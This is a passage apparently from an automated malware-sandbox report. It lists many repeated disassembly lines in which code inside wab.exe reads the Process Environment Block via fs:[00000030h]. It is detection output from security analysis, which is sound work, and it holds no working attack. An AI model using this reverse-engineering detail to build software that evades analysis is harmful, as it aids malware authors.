Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B402E1 mov eax, dword ptr fs:[00000030h] 15_2_23B402E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B402E1 mov eax, dword ptr fs:[00000030h] 15_2_23B402E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B402E1 mov eax, dword ptr fs:[00000030h] 15_2_23B402E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2B2D3 mov eax, dword ptr fs:[00000030h] 15_2_23B2B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2B2D3 mov eax, dword ptr fs:[00000030h] 15_2_23B2B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2B2D3 mov eax, dword ptr fs:[00000030h] 15_2_23B2B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5F2D0 mov eax, dword ptr fs:[00000030h] 15_2_23B5F2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5F2D0 mov eax, dword ptr fs:[00000030h] 15_2_23B5F2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3A2C3 mov eax, dword ptr fs:[00000030h] 15_2_23B3A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3A2C3 mov eax, dword ptr fs:[00000030h] 15_2_23B3A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3A2C3 mov eax, dword ptr fs:[00000030h] 15_2_23B3A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3A2C3 mov eax, dword ptr fs:[00000030h] 15_2_23B3A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3A2C3 mov eax, dword ptr fs:[00000030h] 15_2_23B3A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h] 15_2_23B5B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h] 15_2_23B5B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h] 15_2_23B5B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h] 15_2_23B5B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h] 15_2_23B5B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h] 15_2_23B5B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5B2C0 mov eax, dword ptr fs:[00000030h] 15_2_23B5B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B392C5 mov eax, dword ptr fs:[00000030h] 15_2_23B392C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B392C5 mov eax, dword ptr fs:[00000030h] 15_2_23B392C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2823B mov eax, dword ptr fs:[00000030h] 15_2_23B2823B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B67208 mov eax, dword ptr fs:[00000030h] 15_2_23B67208
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B67208 mov eax, dword ptr fs:[00000030h] 15_2_23B67208
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B59274 mov eax, dword ptr fs:[00000030h] 15_2_23B59274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B71270 mov eax, dword ptr fs:[00000030h] 15_2_23B71270
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B71270 mov eax, dword ptr fs:[00000030h] 15_2_23B71270
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h] 15_2_23BE0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h] 15_2_23BE0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h] 15_2_23BE0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h] 15_2_23BE0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h] 15_2_23BE0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h] 15_2_23BE0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h] 15_2_23BE0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h] 15_2_23BE0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h] 15_2_23BE0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h] 15_2_23BE0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h] 15_2_23BE0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE0274 mov eax, dword ptr fs:[00000030h] 15_2_23BE0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B34260 mov eax, dword ptr fs:[00000030h] 15_2_23B34260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B34260 mov eax, dword ptr fs:[00000030h] 15_2_23B34260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B34260 mov eax, dword ptr fs:[00000030h] 15_2_23B34260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BFD26B mov eax, dword ptr fs:[00000030h] 15_2_23BFD26B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BFD26B mov eax, dword ptr fs:[00000030h] 15_2_23BFD26B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2826B mov eax, dword ptr fs:[00000030h] 15_2_23B2826B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2A250 mov eax, dword ptr fs:[00000030h] 15_2_23B2A250
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C05227 mov eax, dword ptr fs:[00000030h] 15_2_23C05227
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BEB256 mov eax, dword ptr fs:[00000030h] 15_2_23BEB256
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BEB256 mov eax, dword ptr fs:[00000030h] 15_2_23BEB256
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B36259 mov eax, dword ptr fs:[00000030h] 15_2_23B36259
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B29240 mov eax, dword ptr fs:[00000030h] 15_2_23B29240
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B29240 mov eax, dword ptr fs:[00000030h] 15_2_23B29240
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6724D mov eax, dword ptr fs:[00000030h] 15_2_23B6724D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4B1B0 mov eax, dword ptr fs:[00000030h] 15_2_23B4B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C051CB mov eax, dword ptr fs:[00000030h] 15_2_23C051CB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE11A4 mov eax, dword ptr fs:[00000030h] 15_2_23BE11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE11A4 mov eax, dword ptr fs:[00000030h] 15_2_23BE11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE11A4 mov eax, dword ptr fs:[00000030h] 15_2_23BE11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BE11A4 mov eax, dword ptr fs:[00000030h] 15_2_23BE11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB019F mov eax, dword ptr fs:[00000030h] 15_2_23BB019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB019F mov eax, dword ptr fs:[00000030h] 15_2_23BB019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB019F mov eax, dword ptr fs:[00000030h] 15_2_23BB019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB019F mov eax, dword ptr fs:[00000030h] 15_2_23BB019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2A197 mov eax, dword ptr fs:[00000030h] 15_2_23B2A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2A197 mov eax, dword ptr fs:[00000030h] 15_2_23B2A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2A197 mov eax, dword ptr fs:[00000030h] 15_2_23B2A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C061E5 mov eax, dword ptr fs:[00000030h] 15_2_23C061E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B87190 mov eax, dword ptr fs:[00000030h] 15_2_23B87190
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B70185 mov eax, dword ptr fs:[00000030h] 15_2_23B70185
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BEC188 mov eax, dword ptr fs:[00000030h] 15_2_23BEC188
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BEC188 mov eax, dword ptr fs:[00000030h] 15_2_23BEC188
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BD71F9 mov esi, dword ptr fs:[00000030h] 15_2_23BD71F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B601F8 mov eax, dword ptr fs:[00000030h] 15_2_23B601F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h] 15_2_23B551EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h] 15_2_23B551EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h] 15_2_23B551EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h] 15_2_23B551EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h] 15_2_23B551EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h] 15_2_23B551EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h] 15_2_23B551EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h] 15_2_23B551EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h] 15_2_23B551EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h] 15_2_23B551EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h] 15_2_23B551EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h] 15_2_23B551EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B551EF mov eax, dword ptr fs:[00000030h] 15_2_23B551EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B351ED mov eax, dword ptr fs:[00000030h] 15_2_23B351ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6D1D0 mov eax, dword ptr fs:[00000030h] 15_2_23B6D1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6D1D0 mov ecx, dword ptr fs:[00000030h] 15_2_23B6D1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BAE1D0 mov eax, dword ptr fs:[00000030h] 15_2_23BAE1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BAE1D0 mov eax, dword ptr fs:[00000030h] 15_2_23BAE1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BAE1D0 mov ecx, dword ptr fs:[00000030h] 15_2_23BAE1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BAE1D0 mov eax, dword ptr fs:[00000030h] 15_2_23BAE1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BAE1D0 mov eax, dword ptr fs:[00000030h] 15_2_23BAE1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF61C3 mov eax, dword ptr fs:[00000030h] 15_2_23BF61C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF61C3 mov eax, dword ptr fs:[00000030h] 15_2_23BF61C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B31131 mov eax, dword ptr fs:[00000030h] 15_2_23B31131
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B31131 mov eax, dword ptr fs:[00000030h] 15_2_23B31131
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2B136 mov eax, dword ptr fs:[00000030h] 15_2_23B2B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2B136 mov eax, dword ptr fs:[00000030h] 15_2_23B2B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2B136 mov eax, dword ptr fs:[00000030h] 15_2_23B2B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2B136 mov eax, dword ptr fs:[00000030h] 15_2_23B2B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C05152 mov eax, dword ptr fs:[00000030h] 15_2_23C05152
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B60124 mov eax, dword ptr fs:[00000030h] 15_2_23B60124
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BDA118 mov ecx, dword ptr fs:[00000030h] 15_2_23BDA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BDA118 mov eax, dword ptr fs:[00000030h] 15_2_23BDA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BDA118 mov eax, dword ptr fs:[00000030h] 15_2_23BDA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BDA118 mov eax, dword ptr fs:[00000030h] 15_2_23BDA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF0115 mov eax, dword ptr fs:[00000030h] 15_2_23BF0115
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F172 mov eax, dword ptr fs:[00000030h] 15_2_23B2F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC9179 mov eax, dword ptr fs:[00000030h] 15_2_23BC9179
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B37152 mov eax, dword ptr fs:[00000030h] 15_2_23B37152
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2C156 mov eax, dword ptr fs:[00000030h] 15_2_23B2C156
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC8158 mov eax, dword ptr fs:[00000030h] 15_2_23BC8158
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B36154 mov eax, dword ptr fs:[00000030h] 15_2_23B36154
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B36154 mov eax, dword ptr fs:[00000030h] 15_2_23B36154
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC4144 mov eax, dword ptr fs:[00000030h] 15_2_23BC4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC4144 mov eax, dword ptr fs:[00000030h] 15_2_23BC4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC4144 mov ecx, dword ptr fs:[00000030h] 15_2_23BC4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC4144 mov eax, dword ptr fs:[00000030h] 15_2_23BC4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC4144 mov eax, dword ptr fs:[00000030h] 15_2_23BC4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B29148 mov eax, dword ptr fs:[00000030h] 15_2_23B29148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B29148 mov eax, dword ptr fs:[00000030h] 15_2_23B29148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B29148 mov eax, dword ptr fs:[00000030h] 15_2_23B29148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B29148 mov eax, dword ptr fs:[00000030h] 15_2_23B29148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF60B8 mov eax, dword ptr fs:[00000030h] 15_2_23BF60B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF60B8 mov ecx, dword ptr fs:[00000030h] 15_2_23BF60B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C050D9 mov eax, dword ptr fs:[00000030h] 15_2_23C050D9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B35096 mov eax, dword ptr fs:[00000030h] 15_2_23B35096
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5D090 mov eax, dword ptr fs:[00000030h] 15_2_23B5D090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5D090 mov eax, dword ptr fs:[00000030h] 15_2_23B5D090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6909C mov eax, dword ptr fs:[00000030h] 15_2_23B6909C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3208A mov eax, dword ptr fs:[00000030h] 15_2_23B3208A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2D08D mov eax, dword ptr fs:[00000030h] 15_2_23B2D08D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2C0F0 mov eax, dword ptr fs:[00000030h] 15_2_23B2C0F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B720F0 mov ecx, dword ptr fs:[00000030h] 15_2_23B720F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B550E4 mov eax, dword ptr fs:[00000030h] 15_2_23B550E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B550E4 mov ecx, dword ptr fs:[00000030h] 15_2_23B550E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2A0E3 mov ecx, dword ptr fs:[00000030h] 15_2_23B2A0E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B380E9 mov eax, dword ptr fs:[00000030h] 15_2_23B380E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB60E0 mov eax, dword ptr fs:[00000030h] 15_2_23BB60E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB20DE mov eax, dword ptr fs:[00000030h] 15_2_23BB20DE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B590DB mov eax, dword ptr fs:[00000030h] 15_2_23B590DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h] 15_2_23B470C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B470C0 mov ecx, dword ptr fs:[00000030h] 15_2_23B470C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B470C0 mov ecx, dword ptr fs:[00000030h] 15_2_23B470C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h] 15_2_23B470C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B470C0 mov ecx, dword ptr fs:[00000030h] 15_2_23B470C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B470C0 mov ecx, dword ptr fs:[00000030h] 15_2_23B470C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h] 15_2_23B470C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h] 15_2_23B470C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h] 15_2_23B470C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h] 15_2_23B470C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h] 15_2_23B470C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h] 15_2_23B470C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h] 15_2_23B470C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h] 15_2_23B470C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h] 15_2_23B470C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h] 15_2_23B470C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h] 15_2_23B470C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h] 15_2_23B470C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BAD0C0 mov eax, dword ptr fs:[00000030h] 15_2_23BAD0C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BAD0C0 mov eax, dword ptr fs:[00000030h] 15_2_23BAD0C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF903E mov eax, dword ptr fs:[00000030h] 15_2_23BF903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF903E mov eax, dword ptr fs:[00000030h] 15_2_23BF903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF903E mov eax, dword ptr fs:[00000030h] 15_2_23BF903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF903E mov eax, dword ptr fs:[00000030h] 15_2_23BF903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2A020 mov eax, dword ptr fs:[00000030h] 15_2_23B2A020
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2C020 mov eax, dword ptr fs:[00000030h] 15_2_23B2C020
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C05060 mov eax, dword ptr fs:[00000030h] 15_2_23C05060
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4E016 mov eax, dword ptr fs:[00000030h] 15_2_23B4E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4E016 mov eax, dword ptr fs:[00000030h] 15_2_23B4E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4E016 mov eax, dword ptr fs:[00000030h] 15_2_23B4E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4E016 mov eax, dword ptr fs:[00000030h] 15_2_23B4E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB4000 mov ecx, dword ptr fs:[00000030h] 15_2_23BB4000
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h] 15_2_23B41070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B41070 mov ecx, dword ptr fs:[00000030h] 15_2_23B41070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h] 15_2_23B41070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h] 15_2_23B41070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h] 15_2_23B41070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h] 15_2_23B41070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h] 15_2_23B41070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h] 15_2_23B41070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h] 15_2_23B41070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h] 15_2_23B41070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h] 15_2_23B41070
